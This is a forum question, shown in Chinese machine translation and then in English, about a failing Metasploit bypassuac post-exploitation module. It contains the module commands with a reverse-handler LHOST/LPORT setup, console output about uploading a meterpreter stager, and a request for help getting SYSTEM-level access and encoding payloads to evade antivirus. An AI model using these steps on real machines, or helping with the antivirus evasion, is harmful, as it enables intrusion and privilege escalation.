metasploit:bypassuac Windows 权限升级挂起
post/windows/escalate/bypassuac 似乎对我来说失败了
出于某种原因,我无法让后利用模块bypassuac 工作。 这就是我所做的:
- 在目标计算机上打开一个 meterpreter 会话(作为 NETWORKSERVICE 用户)
- 将会话置于后台
尝试使用如下的后利用模块:
使用 post/windows/escalate/bypassuac 设置会话 1 设置LHOST 192.168.1.100 设置 LPORT 4444 漏洞
该端口尚未使用,因此应该没问题。
输出如下:
[-] 处理程序无法绑定到 192.168.1.100:4444 [] 在 0.0.0.0:4444 上启动反向处理程序 [] 启动有效负载处理程序... [] 正在将旁路 UAC 可执行文件上传到文件系统... [] Meterpreter stager 可执行文件 73802 字节长正在上传.. [] 已将代理上传到文件系统... []模块后执行完成
然后它返回到控制台并且什么都不做,没有新会话,什么也不做。
我检查了以下内容:
- 将可执行文件bypassuac-x86.exe手动上传到目标。效果非常好。
- 检查病毒扫描程序的警钟是否没有从可执行文件中响起。他们没有
有一种手动运行可执行文件的方法吗?有人可以向我解释一下如何使用系统级别访问权限打开一个新的 meterpreter 会话吗?
或者我可以以某种方式对有效负载进行编码并使用我的自定义模板来逃避所有防病毒可能性吗?我还没有找到任何对后利用模块进行编码的选项。
预先感
谢哈尔瓦尔
post/windows/escalate/bypassuac seems to fail for me
For some reason I can't get the post exploitation module bypassuac to work.
This is what I did:
- Opened a meterpreter session on the target machine (as the NETWORKSERVICE user)
- Put the session in background
Tried to use the post exploitation module like this:
use post/windows/escalate/bypassuac
set SESSION 1
set LHOST 192.168.1.100
set LPORT 4444 exploitThe port is not used yet so should be fine.
The output is as follows:
[-] Handler failed to bind to 192.168.1.100:4444
[] Started reverse handler on 0.0.0.0:4444
[] Starting the payload handler...
[] Uploading the bypass UAC executable to the filesystem...
[] Meterpreter stager executable 73802 bytes long being uploaded..
[] Uploaded the agent to the filesystem....
[] Post module execution completedThen it returns to the console and does nothing, no new session, nothing whatsoever.
I checked the following things:
- Uploading the executable bypassuac-x86.exe manually to the target. That worked perfectly fine.
- Checked whether the virusscanner's alarm bells didn't ring from the executable. They didn't
Is there a way of manually running the executable and could someone explain me how that would work to open a new meterpreter session with SYSTEM level access?
Or can I somehow encode the payload and use my custom template to evade all antivirus possibilities? I haven't found any option to encode post-exploitation modules yet.
Thanks in advance
Halvar
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(1)